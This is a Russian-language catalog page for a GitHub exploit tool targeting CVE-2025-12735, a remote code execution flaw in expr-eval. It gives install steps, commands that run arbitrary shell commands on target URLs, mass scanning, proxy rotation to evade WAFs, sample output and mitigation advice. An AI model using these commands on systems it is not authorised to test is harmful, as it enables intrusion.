Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-12735-expr-eval-rce — Инструмент для исследований в области безопасности, предназначенный для обнаружения и проверки CVE-2025-12735 (уязвимость RCE в expr-eval). | Kitploit
Инструменты/GitHubGitHub/alnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubalnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

Инструмент для исследований в области безопасности, предназначенный для обнаружения и проверки CVE-2025-12735 (уязвимость RCE в expr-eval).

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
9 месяцев назадЕщё не проверено

Эксплойт RCE для CVE-2025-12735 expr-eval

Инструмент для исследования безопасности, предназначенный для обнаружения и проверки уязвимости CVE-2025-12735 в npm-пакетах expr-eval и expr-eval-fork.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам противозаконен. Используйте этот инструмент только на системах, которыми вы владеете, или на тестирование которых у вас есть явное письменное разрешение.

📋 Обзор

CVE-2025-12735 — это критическая уязвимость удалённого выполнения кода (RCE) в npm-пакетах expr-eval и expr-eval-fork. Данная уязвимость позволяет злоумышленникам определять произвольные функции внутри объекта context, используемого парсером, что даёт возможность внедрения вредоносного кода, выполняющего системные команды.

Оценка CVSS: 9.8 (критическая)
Затронутые версии: expr-eval-fork < 3.0.0
Исправленная версия: expr-eval-fork v3.0.0+

🔍 Возможности

  • Автоматическое обнаружение: сканирует JavaScript-файлы на предмет использования библиотеки expr-eval
  • Поиск конечных точек: автоматически находит конечные точки вычисления выражений
  • Проверка уязвимости: тестирует на наличие уязвимости CVE-2025-12735
  • Выполнение команд: демонстрирует возможность RCE (для авторизованного тестирования)
  • Поддержка многопоточности: параллельное сканирование нескольких целей
  • Поддержка прокси: обход ограничений WAF/Cloudflare
  • Экспорт в JSON: подробные результаты в формате JSON

📦 Установка

Предварительные требования

  • Python 3.6 или выше
  • pip (менеджер пакетов Python)

Быстрая установка

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

Альтернатива: прямое скачивание

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Install dependencies
pip install requests

🚀 Использование

Базовое использование

root@kitploit:~
# Single target
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Execute custom command
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# With threading for faster scanning
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Verbose output for debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

Использование прокси

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

Параметры командной строки

root@kitploit:~
-u, --url          Target URL
-f, --file         File containing target URLs (one per line)
-c, --command      Command to execute (default: id)
-t, --threads      Number of threads (default: 1)
-o, --output       Output file (default: uknf_expr_eval_results.json)
-v, --verbose      Enable verbose logging
--proxy            Proxy URL (e.g., http://127.0.0.1:8080)
--proxy-list       File containing proxy URLs (one per line)

📊 Вывод

Скрипт генерирует JSON-файл с подробными результатами:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 Как это работает

  1. Этап обнаружения: сканирует JavaScript-файлы и HTML-контент на наличие ссылок на expr-eval
  2. Поиск конечных точек: проверяет типовые API-конечные точки, которые могут использовать expr-eval
  3. Проверка уязвимости: пытается внедрить произвольные функции в объект context
  4. Эксплуатация: при наличии уязвимости демонстрирует возможность RCE

🛡️ Меры по устранению

Если вы используете expr-eval или expr-eval-fork:

  1. Немедленно обновитесь:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. Примените патч безопасности:

    • Примените Pull Request #288 к expr-eval
    • Или перейдите на expr-eval-fork v3.0.0+
  3. Внедрите валидацию входных данных:

    • Очищайте все пользовательские входные данные
    • Используйте белые списки функций
    • Проверяйте объекты context

📚 Ссылки

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • Рекомендация GitHub по безопасности: GHSA-jc85-fpwf-qm7x
  • Патч безопасности: PR #288

📖 Примеры

Пример 1: Сканирование одной цели

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

Пример 2: Несколько целей с выводом результатов

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

Пример 3: Выполнение произвольной команды

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

Пример 4: Использование прокси

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 Участие в разработке

Мы приветствуем ваш вклад! Не стесняйтесь отправлять Pull Request.

  1. Сделайте форк репозитория
  2. Создайте свою функциональную ветку (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте свои изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте изменения в ветку (git push origin feature/AmazingFeature)
  5. Откройте Pull Request

🐛 Проблемы

Если вы столкнулись с какими-либо проблемами или у вас есть предложения, пожалуйста, создайте issue на GitHub.

📝 Лицензия

Этот проект распространяется под лицензией MIT — подробнее см. в файле LICENSE.

⭐ История звёзд

Если вы находите этот инструмент полезным, пожалуйста, поставьте ему звезду на GitHub!

⚖️ Правовая информация

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этой программой. Пользователи обязаны убедиться, что у них есть соответствующие разрешения перед тестированием любых систем.

🙏 Благодарности

  • Автор первоначального сообщения об уязвимости: Jangwoo Choe (UKO)
  • Центру координации CERT за раскрытие информации об уязвимости
  • GitHub Security и npm за рекомендации по безопасности

💰 Пожертвования

Если вы находите этот инструмент полезным и хотите поддержать проект:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Спасибо за вашу поддержку! 🙏

Скачать инструмент